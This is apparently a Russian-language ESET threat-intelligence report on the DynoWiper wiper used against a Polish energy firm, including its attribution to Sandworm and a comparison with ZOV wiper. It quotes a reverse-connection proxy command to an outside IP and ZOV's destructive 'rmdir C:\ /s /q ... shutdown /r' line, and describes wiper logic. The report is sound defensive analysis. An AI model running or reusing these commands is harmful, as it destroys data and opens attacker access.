Обновление DynoWiper: технический анализ и атрибуция

В этом посте мы делимся более подробной технической информацией, связанной с нашей предыдущей публикацией о DynoWiper.

Ключевые моменты отчета:

• Исследователи ESET выявили новый вредоносный софт для стирания данных, который мы назвали DynoWiper. Он использовался против энергетической компании в Польше.
• Тактики, техники и процедуры (TTPs), наблюдаемые во время инцидента с DynoWiper, очень похожи на те, что были замечены ранее в этом году при инциденте с wiper ZOV в Украине: Z, O и V — это российские военные символы.
• Мы с средней уверенностью относим DynoWiper к группе Sandworm, в отличие от wiper ZOV, который мы относим к Sandworm с высокой уверенностью.

Профиль Sandworm

Sandworm — это пророссийская группа злоумышленников, проводящая деструктивные атаки. Она в основном известна своими атаками на украинские энергетические компании в 2015-12 и 2016-12 годах, которые привели к отключениям электроэнергии. В 2017-06 Sandworm запустила атаку NotPetya, которая уничтожала данные и использовала вектор атаки через цепочку поставок, компрометируя украинское бухгалтерское ПО M.E.Doc. В 2018-02 Sandworm осуществила атаку Olympic Destroyer, уничтожавшую данные, против организаторов зимних Олимпийских игр 2018 года в Пхёнчхане.

Группа Sandworm использует такое продвинутое вредоносное ПО, как Industroyer, способное общаться с оборудованием энергетических компаний через промышленные протоколы управления. В 2022-04 CERT-UA пресекла атаку на украинскую энергетическую компанию, где группа Sandworm пыталась развернуть новый вариант этого вредоносного ПО, Industroyer2.

В 2020-10 Министерство юстиции США опубликовало обвинительное заключение против шести российских хакеров, которых оно обвинило в подготовке и проведении различных атак Sandworm. Группу часто относят к Управлению 74455 Главного разведывательного управления (ГРУ) России.

История деструктивных операций Sandworm

Sandworm — это злоумышленник, известный проведением деструктивных кибератак, нацеленных на широкий спектр объектов, включая государственные учреждения, логистические компании, транспортные фирмы, поставщиков энергии, СМИ, компании зернового сектора и телекоммуникационные компании. Эти атаки обычно включают развертывание wiper malware — вредоносного ПО, предназначенного для удаления файлов, стирания данных и вывода систем из строя.

Ее операторы имеют долгую историю проведения подобных кибератак, и мы подробно документировали их деятельность. В этом посте мы сосредоточимся на их недавних операциях с использованием вредоносного ПО для стирания данных.

Чтобы избежать обнаружения средствами безопасности, Sandworm часто модифицирует развертываемое деструктивное вредоносное ПО — иногда путем внесения незначительных изменений или генерации новых скомпилированных вариантов из исходного кода, а иногда полностью отказываясь от определенного wiper и переключаясь на совершенно новое семейство вредоносных программ для своих операций. Мы редко видим, чтобы Sandworm пыталась развернуть образец деструктивного вредоносного ПО, который использовался в более ранней атаке (например, с известным хешем) или который уже обнаруживается во время развертывания.

С февраля 2022 года мы тщательно отслеживаем инциденты с деструктивным вредоносным ПО и публично документировали наши выводы в таких отчетах, как Год атак wiper в Украине. За эти годы Sandworm развернула широкий спектр семейств деструктивного вредоносного ПО, включая, примерно в хронологическом порядке, HermeticWiper, HermeticRansom, CaddyWiper, DoubleZero, ARGUEPATCH, ORCSHRED, SOLOSHRED, AWFULSHRED, Prestige ransomware, RansomBoggs ransomware, wiper на основе SDelete, BidSwipe, ROARBAT, SwiftSlicer, NikoWiper, SharpNikoWiper, ZEROLOT, Sting wiper и ZOV wiper. Стоит отметить, что некоторые из этих семейств вредоносных программ развертывались несколько раз в ходе различных инцидентов. В 2025 году ESET расследовала более 10 инцидентов с деструктивным вредоносным ПО, отнесенным к Sandworm, причем почти все они произошли в Украине.

Мы постоянно совершенствуем наши продукты для улучшения раннего обнаружения операций Sandworm — в идеале, выявляя активность до развертывания деструктивных wiper и, когда это возможно, предотвращая ущерб даже при выполнении ранее неизвестного деструктивного вредоносного ПО. Поскольку большинство кибератак Sandworm в настоящее время направлены на Украину, мы тесно сотрудничаем с нашими украинскими партнерами, включая CERT-UA (Computer Emergency Response Team of Ukraine), для поддержки усилий по предотвращению и устранению последствий.

Помимо Украины, Sandworm имеет десятилетнюю историю таргетинга компаний в Польше, в том числе в энергетическом секторе. Обычно эти операции проводились скрытно в целях кибершпионажа, как в случаях BlackEnergy и GreyEnergy. Примечательно, что мы впервые обнаружили развертывание вредоносного ПО GreyEnergy в польской энергетической компании еще в 2015 году.

Однако с начала полномасштабного вторжения России в Украину Sandworm изменила свою тактику в отношении целей в Польше. В частности, в октябре 2022 года она провела деструктивную атаку на логистические компании как в Украине, так и в Польше, маскируя операцию под инцидент с ransomware Prestige. Microsoft Threat Intelligence сообщила об инцидентах с Prestige ransomware, которые они отнесли к Seashell Blizzard (известной также как Sandworm). В ESET мы обнаружили семейство Prestige ransomware и публично отнесли эту активность к Sandworm.

В декабре 2025 года мы обнаружили развертывание образца деструктивного вредоносного ПО, которое мы назвали DynoWiper, в энергетической компании в Польше. Установленный продукт EDR/XDR, ESET PROTECT, заблокировал выполнение wiper, значительно ограничив его воздействие в среде. В этом посте мы раскрываем дополнительные сведения об этой активности и описываем наш процесс атрибуции.

CERT Polska отлично справилась с расследованием инцидента и опубликовала подробный анализ в отчете, доступном на их веб-сайте.

DynoWiper

29 декабря 2025 года образцы DynoWiper были развернуты в каталоге C:inetpubpub, который, вероятно, является общим каталогом в домене жертвы, под следующими именами файлов: schtask.exe, schtask2.exe и <redacted>_update.exe. Образцы schtask*.exe содержат путь PDB C:UsersvagrantDocumentsVisual Studio 2013ProjectsSourceReleaseSource.pdb. Имя пользователя vagrant связано с инструментом Vagrant, который может использоваться для управления виртуальными машинами. Это говорит о том, что машина, использовавшаяся для сборки wiper, является Vagrant box или, что более вероятно, хост-системой, управляющей виртуальными машинами с помощью Vagrant. Поэтому возможно, что операторы Sandworm сначала протестировали операцию на виртуальных машинах перед развертыванием вредоносного ПО в целевой организации.

Злоумышленники изначально развернули <redacted>_update.exe (PE timestamp: 2025‑12‑26 13:51:11). Когда эта попытка не удалась, они изменили код wiper, скомпилировали его, а затем развернули schtask.exe (PE timestamp: 2025‑12‑29 13:17:06). Эта попытка также, похоже, была безуспешной, поэтому они пересобрали wiper с немного измененным кодом, в результате чего получился schtask2.exe (PE timestamp: 2025‑12‑29 14:10:07). Вероятно, даже эта последняя попытка потерпела неудачу. Все три образца были развернуты в один день — 29 декабря 2025 года. ESET PROTECT был установлен на целевых машинах и, похоже, помешал выполнению всех трех вариантов.

Рабочий процесс DynoWiper можно разделить на три отдельных этапа, которые описаны далее в тексте. Образцы schtask*.exe включают только первые два этапа и вводят пятисекундную задержку между ними. В отличие от этого, <redacted>_update.exe реализует все три этапа и не имеет пятисекундной задержки.

Wiper перезаписывает файлы с использованием 16-байтного буфера, содержащего случайные данные, сгенерированные один раз в начале выполнения wiper. Файлы размером 16 байт или менее полностью перезаписываются, а меньшие файлы расширяются до 16 байт. Чтобы ускорить процесс уничтожения, другие файлы (размером более 16 байт) имеют только часть своего содержимого перезаписанной.

Во время первого этапа вредоносное ПО рекурсивно стирает файлы на всех съемных и фиксированных дисках, исключая определенные каталоги (с учетом регистра):

• system32
• windows
• program files
• program files(x86) (пробел пропущен перед открывающей скобкой)
• temp
• recycle.bin
• $recycle.bin
• boot
• perflogs
• appdata
• documents and settings

Для <redacted>_update.exe и schtask.exe второй этап работает аналогично, но на этот раз ранее исключенные каталоги не пропускаются в корневом каталоге (например, C:). В результате путь, такой как C:Windows, больше не исключается, а C:WindowsSystem32 по-прежнему исключается. Для schtask2.exe, во втором этапе, все файлы и каталоги на съемных и фиксированных дисках удаляются через API DeleteFileW без пропуска каких-либо каталогов и без перезаписи файлов.

Третий этап принудительно перезагружает систему, завершая уничтожение системы.

В отличие от Industroyer и Industroyer2, обнаруженные образцы DynoWiper сосредоточены исключительно на ИТ-среде, без наблюдаемой функциональности, нацеленной на промышленные компоненты OT (операционные технологии). Однако это не исключает возможности того, что такие возможности присутствовали где-то еще в цепочке атаки.

Другие развернутые инструменты

Мы выявили дополнительные инструменты, использовавшиеся в той же сети до развертывания wiper.

На ранних этапах атаки злоумышленники пытались скачать общедоступный инструмент Rubeus. Использовался следующий путь: c:users<USERNAME>downloadsrubeus.exe.

В начале декабря 2025 года злоумышленники пытались дампить процесс LSASS с помощью диспетчера задач Windows. Кроме того, они попытались скачать и запустить общедоступный SOCKS5 proxy-инструмент под названием rsocx. Злоумышленники пытались выполнить этот прокси в режиме обратного соединения, используя командную строку C:Users<USERNAME>Downloadsr.exe -r 31.172.71[.]5:8008. Этот сервер используется ProGame (progamevl[.]ru), школой программирования для детей во Владивостоке, Россия, и, вероятно, был скомпрометирован.

ZOV wiper

Мы выявили несколько сходств с ранее известным деструктивным вредоносным ПО, в частности с wiper, который мы назвали ZOV, и который мы с высокой уверенностью относим к Sandworm. DynoWiper работает в целом аналогично ZOV wiper. Примечательно, что исключение определенных каталогов и особенно четкая отдельная логика для стирания файлов меньшего и большего размера также присутствуют в коде ZOV wiper.

ZOV — это деструктивное вредоносное ПО, которое мы обнаружили развернутым против финансового учреждения в Украине в ноябре 2025 года.

После выполнения ZOV wiper проходит по всем файлам на всех фиксированных дисках и стирает их, перезаписывая содержимое. Он пропускает файлы в следующих каталогах:

• $Recycle.Bin
• AppData
• Application Data
• Program Files
• Program Files (x86)
• Temp
• Windows
• Windows.old

Способ стирания файла зависит от его размера. Чтобы как можно быстрее уничтожить данные, файлы размером менее 4098 байт полностью перезаписываются; более крупные файлы имеют перезаписанной только часть содержимого. Буфер, который многократно записывается в файлы, имеет размер 4098 байт и начинается со строки ZOV (ссылаясь на российские военные символы), за которой следуют нулевые байты.

После завершения этого быстрого стирания он выводит информацию о количестве стертых каталогов и файлов, а затем выполняет командную строку time /t & ver & rmdir C:\ /s /q && dir && shutdown /r (вывести текущее местное время и версию Windows, стереть содержимое диска C:, перечислить текущий рабочий каталог и инициировать перезагрузку системы).

Непосредственно перед выходом wiper вставляет изображение из своих ресурсов в %appdata%LocWall.jpg и устанавливает его в качестве фона рабочего стола. Как показано на Рисунке 1, обои также имеют символ ZOV.

Был еще один случай использования ZOV wiper в энергетической компании в Украине, где злоумышленники развернули wiper 25 января 2024 года. В наблюдаемом образце буфер, который записывается в файлы, не содержит символ ZOV. Вместо этого он содержит один символ P, за которым следуют нулевые байты. Кроме того, текст на вставленном изображении (см. Рисунок 2) напоминает записку с требованием выкупа, но ссылается на несуществующий биткоин-адрес.

Методы развертывания деструктивного вредоносного ПО

Sandworm обычно злоупотребляет групповыми политиками Active Directory для развертывания своего вредоносного ПО для стирания данных на всех машинах в скомпрометированной сети. Организационное развертывание GPO обычно требует привилегий Domain Admin и часто осуществляется с контроллера домена. Эта активность подчеркивает изощренность Sandworm и ее доказанную способность получать доступ к Active Directory с высокими привилегиями во многих вторжениях.

Во время реагирования на инцидент с атакой Industroyer2 в апреле 2022 года CERT-UA обнаружила скрипт PowerShell, который они назвали POWERGAP. Sandworm часто использовала этот скрипт для развертывания различных вредоносных программ для стирания данных в нескольких организациях. Позже, в ноябре 2022 года, исследователи ESET обнаружили, что тот же скрипт использовался для распространения RansomBoggs ransomware в Украине. Однако в какой-то момент Sandworm перестала использовать этот скрипт развертывания, но продолжала развертывать деструктивное вредоносное ПО через групповые политики Active Directory.

Интересно, что при анализе инцидента с ZOV wiper мы выявили новый скрипт PowerShell, использованный для развертывания ZOV wiper. Этот скрипт содержит жестко закодированные переменные, специфичные для среды жертвы, включая имя контроллера домена, имя домена, имя объекта групповой политики (GPO), развернутое имя файла, путь к файлу, строку ссылки на GPO и имя запланированной задачи. После выполнения скрипт выполняет все необходимые действия для распространения вредоносного бинарного файла среди пользователей и компьютеров во всем домене.

Более того, скрипт развертывания с очень похожей функциональностью, но без сильного сходства кода, был обнаружен при развертывании DynoWiper в польской энергетической компании. Однако в этом случае вредоносный бинарный файл не распространялся на отдельные компьютеры, а выполнялся непосредственно из общего сетевого каталога.

Как упоминалось выше, операции такого рода, связанные со стиранием данных, обычно требуют, чтобы злоумышленник имел привилегии Domain Admin. Как только злоумышленник достигает этого уровня доступа, защита среды становится чрезвычайно сложной, поскольку он может выполнять практически любые действия в домене. Некоторые организации, особенно в энергетическом секторе, также намеренно сегментируют или изолируют части своих ИТ/OT-сред для удовлетворения операционных требований и требований безопасности. Хотя эта изоляция может быть подходящим выбором управления рисками, она обычно снижает видимость для защитников и может замедлить сбор доказательств и рабочие процессы реагирования, что, в свою очередь, может усложнить расследование инцидентов и привести к снижению уверенности в атрибуции.

Атрибуция

Мы с средней уверенностью относим DynoWiper к Sandworm. Следующие факторы подтверждают нашу оценку:

• Существует сильное совпадение между TTPs, наблюдаемыми в этой активности, и теми, которые обычно ассоциируются с операциями Sandworm. В частности, использование вредоносного ПО для стирания данных и его развертывание через групповые политики Active Directory — это техники, часто используемые Sandworm. Как описано выше, мы выявили сходство как в используемых wipers, так и в скрипте развертывания групповых политик при сравнении этого случая с предыдущей деятельностью Sandworm.
• Целевая отрасль соответствует типичным интересам Sandworm. Эта группа часто нацеливается на энергетические компании и имеет подтвержденный опыт атак на OT-среды.
• Исторически Sandworm нацеливалась на польские энергетические компании в целях кибершпионажа, используя семейства вредоносных программ BlackEnergy и GreyEnergy.
• Нам не известно о других недавно активных злоумышленниках, которые использовали вредоносное ПО для стирания данных в своих операциях против целей в странах Европейского Союза.

Следующие факторы противоречат атрибуции Sandworm:

Хотя Sandworm ранее нацеливалась на компании в Польше, обычно она делала это скрытно — либо только в целях кибершпионажа, либо маскируя свою деятельность по стиранию данных под атаку ransomware, как в случаях с Prestige ransomware. Стоит отметить, что мы относим компонент стирания данных этой активности к Sandworm только со средней уверенностью. У нас нет информации о методе первоначального доступа, использованном в этом инциденте, и поэтому мы не можем оценить, как или кем были выполнены первые шаги. В частности, подготовительные этапы, ведущие к деструктивной активности, могли быть проведены другой группой злоумышленников, сотрудничающей с Sandworm. Примечательно, что в 2025 году мы наблюдали и подтвердили, что группа UAC‑0099 проводила операции первоначального доступа против целей в Украине, а затем передавала подтвержденные цели Sandworm для последующей деятельности.

Заключение

Этот инцидент представляет собой редкий и ранее невиданный случай, когда пророссийский злоумышленник развернул деструктивное вредоносное ПО для стирания данных против энергетической компании в Польше.

По всем вопросам, касающимся наших исследований, опубликованных на WeLiveSecurity, пожалуйста, свяжитесь с нами по адресу threatintel@eset.com.

ESET Research предлагает частные отчеты по APT-интеллекту и потоки данных. По всем вопросам, касающимся этой услуги, посетите страницу ESET Threat Intelligence.

IoCs

Сеть

MITRE ATT&CK техники

Эта таблица составлена с использованием версии 18 фреймворка MITRE ATT&CK.

Читать полный анализ на WeLiveSecurity →